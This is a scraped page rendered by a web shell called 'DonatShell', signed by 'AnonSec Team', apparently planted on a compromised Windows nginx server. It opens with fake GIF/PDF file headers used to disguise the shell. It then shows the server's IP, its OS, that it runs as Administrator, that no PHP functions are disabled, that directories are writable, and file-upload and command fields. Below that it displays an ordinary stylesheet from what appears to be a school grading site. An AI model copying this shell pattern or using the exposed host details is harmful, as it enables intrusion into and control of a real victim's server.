GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 134.29.175.74  /  Your IP : 216.73.216.160
Web Server : nginx/1.10.2
System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586
User : Administrator ( 0)
PHP Version : 7.1.0
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/nginx/html/css/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : C:/nginx/html/css/CST.css
@charset "utf-8";

:root {
	--action-color: #dd0;
	--attention-color: #af3;
	--info-color: #aaf;
	--info-color-hover: #eef;
	--ins-content-color: #00f;
	--ins-background-color: #def;
	--del-color: #ccc;
	--del-content-color: #f00;
	--del-background-color: #900;
} /* var(--del-ccc) */

#counterText { background-color: yellow; display: none; }
#divFileploadError { font-weight: bold; color: #f00; display: inline-block; }
#spnToMeasureCounterTextWidth { display: none; }

.attention { background-color: #000; border: 2px solid black; border-radius: 5px; box-sizing:border-box; color: #ff0; font-weight: bold; padding-left: .2em; padding-right: .2em; }
.black { color: #000; }
.bold { font-weight: bold; }
.center { text-align: center; }
.centered { margin: 0 auto; }
.classDate { color: #00c; font-weight: bold; }
.classDatePast { color: #666; font-weight: bold; }
.classDateToday { background-color:#afa; color: #000; font-weight: bold; }
.clearBoth { clear: both; }
.copyright { color: darkgray; font-size: smaller; font-weight: normal; text-align: center; }
.copyText { outline: #C6D8A4 dotted 2px; }
.correctAnswer { color: #080; }
.currentpage { color: #a5f; }
.overline { text-decoration: overline; }
.strike { text-decoration: line-through; }
.underline { text-decoration: underline; }
.d_s_a  { color: #04BA04; }                    /* attention */
.d_s_an { color: #f00; }                       /* array name */
.d_s_ap { color: #f33; }                       /* array-part name */
.d_s_as { color: #f66; }                       /* array scaler name */
.d_s_b  { font-weight: bold; }                 /* bold */
.d_s_d  { color: #000; }                       /* data value */
.d_s_dn { color: #000; font-weight: normal; }  /* data value normal */
.d_s_e  { color: #f00; }                       /* error */
.d_s_f  { color: #00c; }                       /* function */
.d_s_fl { color: darkgray; font-size: 1em; }   /* file and line */
.d_s_fp { color: darkgray; font-size: 0.8em; } /* file path */
.d_s_h  { display: none; }                     /* hidden */
.d_s_i  { color: #08f; }                       /* info */
.d_s_l  { text-align: left; }                  /* left */
.d_s_n  { color: #0f0; }                       /* notice */
.d_s_pw { color: #f60; font-weight: bold; }    /* password */
.d_s_q  { color: #90f; font-family: "Courier New", Courier, monospace; white-space: pre; } /* query */
.d_s_qc { color: #f0f; }                       /* query count */
.d_s_r  { color: #066; }                       /* resource name */
.d_s_v  { color: #666; }                       /* variable (other) */
.d_s_vf { color: #c00; }                       /* false */
.d_s_vt { color: #0c0; }                       /* true */
.d_s_w  { color: #f90; }                       /* warn */
.display_block { display: block; }
.due { color: #2A3FAA; }
.error { color: #f00; }
.errorbold { font-weight: bold; color: #f00; }
.evalCr { background-color: #ff0; }
.evalOverdue, .evalNE, .gradeF, .userNoEntry, .userNever, .userDrop, .incorrect { color: #b00; }
.evalEC, .evalDueInFuture, .gradeA, .evalGR, .userGraded, .userCurrent, .userBoth, .userAuthenticated, .correct { color: #080; }
.evalGR { font-weight: bold; }
.evalNG, .evalDueToday, .gradeB, .gradeNG, .userUnGraded, .userRecent, .userAdd { color: #00b; }
.evalNG { background-color: #ff8 !important; }
.evalNS, .evalDueLastWeek, .userNotSubmitted, .userOlder { color: #f90; }
.evalOD { text-decoration-color: #b00; text-decoration-line: line-through; text-decoration-style: double; }
.gradeFCritical { background-color: #ff0; font-weight: bold;}
.gray, .evalDueUnknown { color:#666; }

.evalBox { background-color: #666; box-sizing: border-box; display:inline-block; height: 1em; margin: auto; margin-top: 2px; width: 1em; }
.evalOverdueBackground { background-color: #b00; }
.evalDueInFutureBackground { background-color: #080; }
.evalDueTodayBackground { background-color: #00b; }
.evalDueLastWeekBackground { background-color: #f90; }
.evalDueUnknownBackground { background-color:#666; }
.evalDueGradedBackground { background-color:#fff; border: 1px solid silver; }
.evalDueUnavailableBackground { background-color:#ccc; border: 1px solid silver; }
.evalBox:hover, .evalTitle {
	overflow-x: visible !important;
	position: relative;
	z-index: 10;
}
/** /
.evalBox[aria-label]:hover:after, .evalTitle[aria-label]:hover:after {
	background:white;
	content: attr(aria-label);
	font-weight: bold;
	left: 1.2em;
	margin-top: -1.5em;
	overflow-x: visible !important;
	padding: 4px 8px;
	position: absolute;
	top: 100%;
	white-space: nowrap;
}
.evalTitle[aria-label]:hover:after {
	background: #eee;
	left: 0px;
	margin-top: 0px;
	outline: 2px solid #888;
	overflow-x: visible !important;
	padding: 1px 4px;
}
.evalBox.evalOverdueBackground[aria-label]:hover:after {
	color: #b00;
	border:1px solid #b00;
}
.evalBox.evalDueInFutureBackground[aria-label]:hover:after {
	color: #080;
	border:1px solid #080;
}
.evalBox.evalDueTodayBackground[aria-label]:hover:after {
	color: #00b;
	border:1px solid #00b;
}
.evalBox.evalDueLastWeekBackground[aria-label]:hover:after {
	color: #f90;
	border:1px solid #f90;
}
.evalBox.evalDueUnknownBackground[aria-label]:hover:after {
	color: #666;
	border:1px solid #666;
}
.evalBox.evalDueUnavailableBackground[aria-label]:hover:after {
	color: #666;
	border:1px solid #666;
}
/**/
.heading { color: #08f; font-size: large; margin: 0px; margin-top: 12px; }
.hidden { display: none; }
.incorrectAnswer { color: #800000; text-decoration: line-through; }
.info { background-color:#def; color: #049; padding-left: .2em; padding-right: .2em; }
.inline { display: inline; }
input[type="button"].disabled { background-color:#888; border:1px solid black; border-radius: 1px; color:#fff; cursor:not-allowed; text-decoration:none; padding: 2px; }
.larger { font-size: larger; }
.left { text-align: left; }
.menuCurrent { color: #a5f; }
.middle { vertical-align: middle; }
.normal { font-size: 1em; font-weight: normal; }
.note, note { color: #08f; font-size: smaller; font-weight: normal; line-height: 1.2em !important; }
.note.normal, note.normal { font-size: 1em !important; }
.noVertMargin { margin: auto 0; }
.nowrap { white-space: nowrap; }
.obj { color: #090; }
.ok { color: #090; }
.pad0 { padding-left: 0px; padding-right: 0px; }
.pad3 { padding-left: 3px; padding-right: 3px; }
.pad4 { padding-left: 4px; padding-right: 4px; }
.pad5 { padding-left: 5px; padding-right: 5px; }
.pagebreak { page-break-before: always; }
.pageImage { text-align: center; vertical-align: middle; width:115px; }
.pageImageBorderAll { border-bottom: 2px solid; border-bottom-color: #000; border-left: 2px solid; border-left-color: #000; border-right: 2px solid; border-right-color: #000; border-top: 2px solid; border-top-color: #000; text-align: center; vertical-align: middle; }
.pageImageBorderLeft { border-bottom: 2px solid; border-bottom-color: #000; border-left: 2px solid; border-left-color: #000; border-top: 2px solid; border-top-color: #000; text-align: center; vertical-align: middle; }
.pageMessage { color: #04BA04; font-size: larger; font-weight: bold; text-align: center; }
.pageName, .pageTitle { font-family: Helvetica, Verdana, Arial, sans-serif; font-size: 1.75em; padding: 5px; text-align: center; vertical-align: top; width:748px; }
.past { color: #999; }
.psAtt { color: #767676; }
.psCmd { color: #f9f1a5; }
.psErr { color: #E73F34; }
.pv_a { color: #f00; font-weight: bold; } /* array name */ 
.pv_as { color: #f00; } /* sub-array name */
.pv_b { font-weight: bold; } /* bold */
.pv_d { color: #000; } /* data value */
.pv_e { color: #f00; } /* error */
.pv_f { color: #00c; } /* function */
.pv_fl { color: darkgray; font-size: 12px; font-weight: normal; } /* file and line */
.pv_i { color: #08f; } /* info */
.pv_l { text-align: left; } /* left */
.pv_n { color: #0f0; } /* notice */
.pv_pw { color: #f60; font-weight: bold; } /* password */
.pv_q { color: #90f; } /* query */
.pv_qc { color: #f0f; } /* query count */
.pv_ua { color: #0c0; } /* user authenticated */
.pv_un { color: #c00; } /* user not authenticated */
.pv_v { color: #666; } /* variable name */
.pv_w { color: #f90; } /* warning */
.right { text-align: right; }
.right5 { padding-top: 5px; text-align: right; }
.row_even { background-color: #fff; }
.row_odd, tr.row_odd td { background-color: #eee; }
.rts { font-weight: bold; text-align: right; vertical-align: top; color: #00f; }
.silver { color: #CCC; }
.small { font-size: 0.75em; }
.smaller { font-size: smaller; }
.today { background-color:#afa; color: #080; }
.userNoEmail { color: #70b !important; }
.userNotInClass { color: #000; }
tr.userNotInClass td, tr.userNotInClass td div { color: #000; background-color: darkgray !important; }
.warning { color: #f90; }
.white { color: #fff; }
.wrap { white-space: normal; }

a.evalNE, a.gradeF, a.userNoEntry, a.userNever, a.userDrop { border-bottom: 2px dotted #b00; color: #b00 !important; text-decoration: none; }
a.evalCr { background-color: #ff0; }
a.evalEC, a.evalGR, a.gradeA, a.userGraded, a.userCurrent, a.userBoth { border-bottom: 2px dotted #080; color: #080 !important; text-decoration: none; }
a.evalNG, a.gradeB, a.userUnGraded, a.userRecent, a.userAdd { border-bottom: 2px dotted #00b; color: #00b !important; text-decoration: none; }
a.evalNS, a.userNotSubmitted, a.userOlder { border-bottom: 2px dotted #f90; color: #f90 !important; text-decoration: none; }
a.userNoEmail { color: #70b !important; text-decoration: none; }
a.userNotInClass { border-bottom: 2px dotted #000; color: #000 !important; text-decoration: none; }

a:link, a:visited, a:active, a:hover, .link {  white-space: nowrap; }
a:link, .link { color: #08f; } /* order must be: a: link, a: visited, a: hover, a: active, a: focus, a.current, a.current: hover, a.parent */
a:visited { color: #04BA04; }
a:active, a:focus { color: #a5f; }
a:hover .d_s_an { background-color: #f00; color: #000; }
a:hover .d_s_r { background-color: #099; color: #fff; }

b { white-space: nowrap; }
body { background-color: #fff; font-size: 1em; /*12px*/ font-family: Helvetica, Verdana, Arial, sans-serif; line-height: 1.5em; color: #000; /** / background-image: url(/images/Ridgewater_white.gif); /**/ text-align: left; }

del, del *, .del { background-color: var(--del-background-color) !important; color: var(--del-ccc) !important; text-decoration: underline dotted var(--del-content-color) !important; }
del a, .del a { background-color: var(--del-background-color) !important; color: var(--del-ccc) !important; text-decoration: underline solid var(--del-content-color) !important; }
del::before, .del::before { content: "Deleted: " ; color: var(--del-content-color) !important; font-size: .75em; font-variant: small-caps; }


/*del::after { content: " Deleted]" ;}*/
div.buttontext { background-color: #CCC; display: inline; }
div.hp { margin-top:.5em !important; margin-bottom:.5em !important; }
div.p { margin-top:1em !important; margin-bottom:1em !important; }
div.ul { overflow: hidden; width: 950px; }
div.urcA { background-image: url(/images/urc.png); background-position: 0px 0px; height: 30px; width: 18px; }
div.urcB { background-image: url(/images/urc.png); background-position: -18px 0px; height: 30px; width: 2px; }
div.floatLeft { float: left; padding-right: 1em; }
div#d_s_pf span.d_s_fp { color: #bbb; font-size: 1em; } /* file path inside of pageFooter_debug #d_s_pf div*/
div#d_s_pf { border: 1px solid silver; font-size: 0.8em; margin-top: 10px; padding: 10px; } /* pageFooter_debug div */
div.border { border: 1px solid silver; display: inline-block; }
div.borderPad { border: 1px solid silver; display: inline-block; margin-right: 1em; padding-left: 1em; padding-bottom: 1em; }
div.d_s_cb { color: #000; display: inline; font-family: "Courier New", Courier, monospace; }
div.d_s_cw { color: #ffffff; display: inline; font-family: "Courier New", Courier, monospace; }
div.d_s_il { display: inline; text-align: left; }   /* div wrapper is inline left */

fieldset { margin: 10px; background-color: #fff; } /*fieldset { width: 956px; margin: 10px; margin-right: 0px;}*/
fieldset.center { margin: 0 auto; text-align: center; }
fieldset.pio { width: 45%; display: inline; vertical-align: top; margin-right: 0px; }

h1 { text-align: center; line-height: .8em; }
h1 { margin-bottom:.5em; }
h2 { margin-bottom:.3em; }
h3 { margin-bottom:.3em; }
h4 { margin-bottom:.1em; }
h5 { margin-bottom:.1em; }
h6 { margin-bottom:.1em; }
hr { clear:both; }

i.ch { color: #9A1239; }
i.text { color: #9A1239; font-weight: bold; }

ins, ins *, .ins { background-color: var(--ins-background-color) !important; color: var(--ins-content-color); text-decoration: underline dotted #88f; }
ins a, .ins a { background-color: var(--ins-background-color) !important; color: var(--ins-content-color); text-decoration: underline solid #88f !important; }
ins::before, .ins::before { content: "Added: " ; color: var(--ins-content-color) !important; font-size: .75em; font-variant: small-caps;}
img { border: 0px; vertical-align: middle; }
img.submitted {border: 1px solid black; width: 100%; }
input.copy { background-color: #ffc; border: 0px; font-family:monospace, sans-serif; font-size:16px; font-weight:bold; padding: 0px; }
input.number1 { width: 0.8em; padding: 0px; padding-left: 2px; padding-right: 2px; text-align: right; }
input.number2 { width: 1.4em; padding: 0px; padding-left: 2px; padding-right: 2px; text-align: right; }
input.number3 { width: 2.0em; padding: 0px; padding-left: 2px; padding-right: 2px; text-align: right; }
input.number4 { width: 2.6em; padding: 0px; padding-left: 2px; padding-right: 2px; text-align: right; }
input.number5 { width: 3.2em; padding: 0px; padding-left: 2px; padding-right: 2px; text-align: right; }
input.num3, input.num8 { font-family: "Courier New", Courier, monospace; font-size: 1em; font-weight: bold; padding: 0px; padding-left: 2px; padding-right: 2px; text-align: right; }
input.num3 { width: 2.0em; }
input.num8 { width: 5.0em; }

input.small { font-size: 0.75em; padding: 0px; margin: 0px; vertical-align: middle; }

label, input { font-weight: normal; margin-top: 2px; } /** / Removed 2007.02.23 label input { position: absolute; left: 100%; top: 0px; width: 10em; } label { position: relative; display: block; margin: .5em 0em; } input.submit { margin-left : 15em; } /**/
legend { color: #08f; font-size: larger; font-weight: bold; padding-right: 3px; }
li { font-weight: normal; list-style-position: outside; vertical-align: top; }
li.checked::before { color: #888; text-decoration: line-through; }

ol { margin-top: 0; margin-bottom: 0; }
ol { margin: 0px 0px 0px 24px; padding: 0px 0px 0px 0px; }
ol#main, ol.next { margin-left: 0; }
ol.close li.close{ margin: 0px 0px 0px 0px; }
ol:not(.alpha).count { counter-reset: itemnumber; }
ol:not(.alpha).count ol:not(.alpha), ol:not(.alpha).count ol:not(.alpha) ol:not(.alpha), ol:not(.alpha).count ol:not(.alpha) ol:not(.alpha) ol:not(.alpha), ol:not(.alpha).count ol:not(.alpha) ol:not(.alpha) ol:not(.alpha) ol:not(.alpha) { counter-reset: itemnumber; }
ol:not(.alpha).count > li:not(.alpha), ol:not(.alpha).count ol:not(.alpha) > li:not(.alpha), ol:not(.alpha).count ol:not(.alpha) ol:not(.alpha) > li:not(.alpha), ol:not(.alpha).count ol:not(.alpha) ol:not(.alpha) ol:not(.alpha) > li:not(.alpha), ol:not(.alpha).count ol:not(.alpha) ol:not(.alpha) ol:not(.alpha) ol:not(.alpha) > li:not(.alpha) { list-style-type: none; }
ol:not(.alpha).count > li:not(.alpha):before, ol:not(.alpha).count ol:not(.alpha) > li:not(.alpha):before, ol:not(.alpha).count ol:not(.alpha) ol:not(.alpha) > li:not(.alpha):before, ol.count ol:not(.alpha) ol:not(.alpha) ol:not(.alpha) > li:not(.alpha):before, ol.count ol:not(.alpha) ol:not(.alpha) ol:not(.alpha) ol:not(.alpha) > li:not(.alpha):before { content: counters(itemnumber, ".") ". "; counter-increment: itemnumber; /** /margin-left: -2em;/**/color:maroon; }
/** /
li:before {
    content: counter(count);
}
li:nth-child(-n+9):before {
    content: '0'counter(count);
}
/**/
ol.alpha > li { list-style-type:upper-alpha !important; }
ol.d_s_op, ol.d_s_ot { padding-left: 2em; padding-right: 2em; } /* TRACKing ol */
ol.d_s_ot { margin-bottom: 0px; margin-top: 0px; } /* top TRACKing ol */
/** /
ol.count { counter-reset:item; }
ol.count ol { counter-reset:item; }
ol.count li.count { list-style-type:none; }
ol.count li.count:before { content:counters(item, ".") ". "; counter-increment:item; }
/**/
ol.instruction li, li.instruction{ margin: 5px 0px 10px 0px; }
ol.pio { /* width: 410px; */ }
p { margin: 10px 0px; }
pre { font-family: "Courier New", Courier, monospace; margin: 0px; }
pre.html, pre.php, pre.code, pre.codechange, pre.codeold, pre.comment, pre.entry, pre.kbd, pre.samp, pre.tt, pre.ttchange, pre.var { border: 1px solid silver; display: table-cell; font-weight: bold; padding: 0px 6px; }

ps { color:#888; }
ps, psatt, pscmd, psval, psvar { background-color:#008; }
ps:after { content:"\00a0"; }
ps:before { content:"\00a0"; }
psatt { color:#888; }
pscmd { color:#ff0; }
psval { color:#fff; }
psvar { color:#0f0; }

span.note::before { content: "Note: "; font-weight: bold; }

table, table td, table th { background-color: transparent; border-collapse: collapse; empty-cells: show; padding: 2px; }
table.nopad, table.nopad  > tbody > tr > td, table.nopad  > tbody > tr > th { padding: 0px; }
table.mono, table.mono td, table.mono th { font-family: "Courier New", Courier, monospace; }
table.p { margin-top:1em !important; margin-bottom:1em !important; }
table.times, table.times td, table.times th { font-family: "Times New Roman", Times, serif; }
table.Tcode, table.Tkbd { border: 1px solid silver; }
table.blackborder { border-top: 1px solid black; border-bottom: 1px solid black; border-left: 1px solid black; border-right: 1px solid black; border-collapse: collapse; }
table.blackline { border-top: 1px solid black; }
table.center { margin: 0 auto; }
table.bdr { border-top: 1px solid silver; border-bottom: 1px solid silver; border-left: 1px solid silver; border-right: 1px solid silver; border-collapse: collapse; }
table.bdr td, table.bdr th { border: 1px solid silver; padding: 1px; padding-right: 2px; }
table.grayborder { border-top: 1px solid silver; border-bottom: 1px solid silver; border-left: 1px solid silver; border-right: 1px solid silver; border-collapse: collapse; }
table.grayline td, table.grayline th { border-top: 1px solid silver; border-bottom: 1px solid silver; padding: 1px; padding-right: 2px; }
table.grayline { border-top: 1px solid silver; border-bottom: 1px solid silver; border-left: 1px solid silver; border-right: 1px solid silver; border-collapse: collapse; }
table.grayline { border-top: 1px solid silver; }
table.pad2 td, table.pad2 th { padding-left: 2px; padding-right: 2px; }
table.pad3 td, table.pad3 th { padding-left: 3px; padding-right: 3px; }
table.pad4 td, table.pad4 th { padding-left: 4px; padding-right: 4px; }
table.pad5 td, table.pad5 th { padding-left: 5px; padding-right: 5px; }
table.note tr td, table.note tr th { color: #08f !important; font-weight: normal; line-height: 1.2em !important; }
table.white { background-color: #fff; }
td { background-color: transparent; color: #000; /*font-size: 0.8em;*/ /*12px*/ font-family: Helvetica, Verdana, Arial, sans-serif; line-height: 1.25em; padding: 0; padding-left: 2px; padding-right: 2px; text-align: left; }
td.Tcode { background-color: #ffc; color: #00f; white-space: pre; }
td.Tcode, td.Tkbd { font-family: "Courier New", Courier, monospace; font-weight: bold; }
td.black { background-color: #000; color: #fff; /* font-weight: bold; */ }
td.blackBorderLeft, td.blackBorderRight { background-color: #000; width: 2px; }
td.blackHeading { background-color: #000; color: #fff; font-weight: bold; padding-bottom:2px !important; text-align: center; vertical-align:middle; /**/min-width: 978px; }
td.border { background-color: #fff; width: 2px; }
td.grayborder, th.grayborder { padding: 2px; border: 1px solid silver; empty-cells: show; }
td.grayleft, th.grayleft { padding: 2px; border-left: 1px solid silver; empty-cells: show; }
td.grayline, th.grayline { padding: 2px; border-bottom: 1px solid silver; empty-cells: show; }
td.grayright, th.grayright { padding: 2px; border-right: 1px solid silver; empty-cells: show; }
td.graysize, th.graysize { padding: 2px; font-size: smaller; empty-cells: show; }
td.instruction { font-weight: normal; padding: 0px 0px 0px 5px; }
td.item { padding-right: 0.5em; text-align: right; white-space: nowrap; }
td.number, th.number { text-align: right; font-family: "Courier New", Courier, monospace; padding-right: .5em; }
td.padLeft, th.padLeft { padding-right: 2px; }
td.padRight, th.padRight { padding-left: 2px; padding-right: 3px; }
td.ul { color: #CCCCCC; }
td.urcA { width: 18px; }
td.urcB { width: 2px; }
td.white { background-color: #fff; color: #000; /* font-weight: bold; */ font-family: Helvetica, Verdana, Arial, sans-serif; line-height: 1.5em; text-align: left; }
td.whiteBorder { background-color: #fff; width: 2px; }
textarea { overflow: hidden; padding: 0; resize: none; }
textarea:focus { border:1px solid #ccc; outline:2px solid yellow; }
th { /*font-size: 0.8em;*/ /*12px*/ padding: 0; padding-left: 2px; padding-right: 2px; }
th.black { background-color: #000; color: #fff; font-weight: bold; font-family: Helvetica, Verdana, Arial, sans-serif; line-height: 1.5em; text-align: left; }
th.left { text-align: left; }
tr { vertical-align: top; }
tr.bottom { vertical-align: bottom; }

ul { margin: 0px 0px 0px 25px; padding: 0px 0px 0px 0px; list-style-type:disc !important; }
ul ul/** /, ol ul/**/ { list-style-type:circle !important; }
ul ul ul/** /, ol ul ul, ul ol ul, ol ol ul/**/ { list-style-type:square !important; }
ul.folder { list-style-image: url('/images/folder_15x12.png'); }
/** /
ul.circle li { list-style-type:circle; }
ul.disc li { list-style-type:disc; }
ul.square li { list-style-type:square; }
/**/

/* Code css */ .cmd, cmd { background-color: #000; color: #ccc; }
/* Code css */ .html, .php, .cmd, .code, .codechange, .codeold, .comm, .entry, .kbd, .samp, .tt, .ttchange, .var, cmd, code, codechange, codeold, comm , entry, kbd, php, samp, tt, ttchange, var { font-family: "Courier New", Courier, monospace; font-weight: bold; line-height:1.1em; }
/* Code css */ .html, .php, .code, .codechange, .codeold, .entry, .kbd, .samp, .tt, .ttchange, .var { margin: 0px 0px 1px 0px; padding: 0px; }
/* Code css */ .php, php,.html, .code, code { background-color: #ffa; color: #080; }
/* Code css */ .codechange, codechange { background-color: #ffa; color: #0c0; }
/* Code css */ .codeold, codeold { background-color: #ffa; color: #666; text-decoration:line-through; }
/* Code css */ .comm, comm { background-color: #ff0; color: #f00; }
/* Code css */ .entry, entry { background-color: #000; color: #ff0; }
/* Code css */ .kbd, kbd { background-color: #000; color: #ccc; }
/* Code css */ .samp, samp { background-color: #ffa; color: #000; }
/* Code css */ .tt, tt { background-color: #ffa; color: #00f; }
/* Code css */ .ttchange, ttchange { background-color: #ffa; color: #f60; }
/* Code css */ .var, var { background-color: #ffa; color: #609; font-style: italic; font-weight: bold; }
/* Code css */ span.cmd, span.code, span.codechange, span.codeold, span.entry, span.kbd, span.pad, span.samp, span.tt, span.ttchange, span.var { padding:0px; padding-left:.25em; padding-right:.25em; }
/* Code css */ .php, php  { background-color: #cff; }
/* HTML css */ .att, .comment, .commentoc, .dec, .decq, .doctypetoc, .inn, .tag, .tagoc, .val, .valq, att, comment, commentoc, dec, decq, doctypetoc inn, tag, tagoc, val, valq { background-color:#ffe; font-family: "Courier New", Courier, monospace; font-weight:bold; }
/* HTML css */ .att, .comment, .commentoc, .doctypetoc, .inn, .tag, .tagoc, .val, .valq { margin: 0px 0px 1px 0px; padding: 0px; }
/* HTML css */ .att, att { color:#680; } /* HTML tag attribute #d13 */
/* HTML css */ .comment, .commentoc, comment, commentoc { background-color:#ff0; color:#f00; } /* HTML comment #080 */
/* HTML css */ .commentoc::after, commentoc::after { content: " -->"; } /* HTML comment */
/* HTML css */ .commentoc::before, commentoc::before { content: "<!-- "; } /* HTML comment */
/* HTML css */ .dec, .decq, dec, decq { color:#85a; } /* CSS declaration value */
/* HTML css */ .doctypetoc, doctypetoc { color:#000; } /* HTML DOCTYPE */
/* HTML css */ .doctypetoc::after, doctypetoc::after { content: " html>"; } /* HTML DOCTYPE */
/* HTML css */ .doctypetoc::before, doctypetoc::before { content: "<!DOCTYPE "; } /* HTML DOCTYPE */
/* HTML css */ .inn, inn { color: #000; }
/* HTML css */ .tag, .tagoc, tag, tagoc { color:#46b; white-space:nowrap; font-weight: bold; } /* HTML tag #06f */
/* HTML css */ .tagoc::after, tagoc::after { content: ">"; } /* HTML tag */
/* HTML css */ .tagoc::before, tagoc::before { content: "<"; } /* HTML tag */
/* HTML css */ .val, .valq, val, valq { color:#e80; } /* HTML attribute value #80f */
/* HTML css */ .decq::after, decq::after, .decq::before, decq::before, .valq::after, valq::after, .valq::before, valq::before { content: '"'; } /* HTML attribute and CSS declaration value */
/* HTML css */ span.att, span.comment, span.tag, span.tt, span.tagoc, span.val, .tag, .tagoc, tag, tagoc { padding:0px; padding-left:.1em; padding-right:.1em; } /**/

@media print { 
.hideFromPrint { display: none; }
a:link, a:visited, a:active { color: #000; }
a[href]:after { content: " (" attr(href) ") "; } /* Display href when page is printed. */
legend { color: #000;  font-size: larger;  font-weight: bold; }
td.blackBorderLeft { border-left: 2px solid black; }
td.blackBorderLeft, td.blackBorderRight, td.blackHeading, td.urcA, td.urcB { border-top: 2px solid black; border-bottom: 2px solid black; }
td.blackBorderRight, td.urcB { border-right: 2px solid black; }
td.ul { color: #666; }
input[type=number]::-webkit-inner-spin-button, input[type=number]::-webkit-outer-spin-button { margin:0; -webkit-appearance:none; }
input[type=number] { border:none !important; box-shadow:none !important; outline:none !important; -moz-appearance:textfield; }
}

Anon7 - 2022
AnonSec Team